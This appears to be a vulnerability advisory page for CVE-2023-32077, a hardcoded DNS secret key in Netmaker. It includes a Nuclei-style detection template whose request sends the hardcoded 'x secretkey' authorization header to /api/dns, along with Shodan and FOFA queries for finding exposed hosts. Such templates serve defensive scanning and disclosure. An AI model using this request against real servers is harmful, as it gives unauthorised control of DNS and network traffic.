漏洞描述
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
CVE-2023-32077: Netmaker - Hardcoded DNS Secret Key
PoC代码[已公开]
id: CVE-2023-32077
info:
name: Netmaker - Hardcoded DNS Secret Key
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
impact: |
Unauthenticated attackers can access DNS API endpoints using the hardcoded secret key, potentially manipulating DNS configurations and redirecting WireGuard network traffic in the Netmaker VPN infrastructure.
remediation: |
Update Netmaker to version 0.17.1 or 0.18.6 or later that removes hardcoded credentials and implements proper authentication for DNS API endpoints.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-32077
cwe-id: CWE-798,CWE-321
epss-score: 0.84662
epss-percentile: 0.99301
cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: gravitl
product: netmaker
shodan-query:
- html:"netmaker"
- http.html:"netmaker"
fofa-query: body="netmaker"
tags: cve,cve2023,info-key,netmaker,exposure,gravitl,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/dns"
headers:
Authorization: "x secretkey"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
condition: and
# digest: 4a0a0047304502205e571a0d70e1a274ea98bdac78485b855a34d87cbef276946867af78e84738c5022100a5c4ade7c4863834766609844c9e7a533eb7a9efa699984db8569b506b1af392:922c64590222798bb761d5b6d8e72950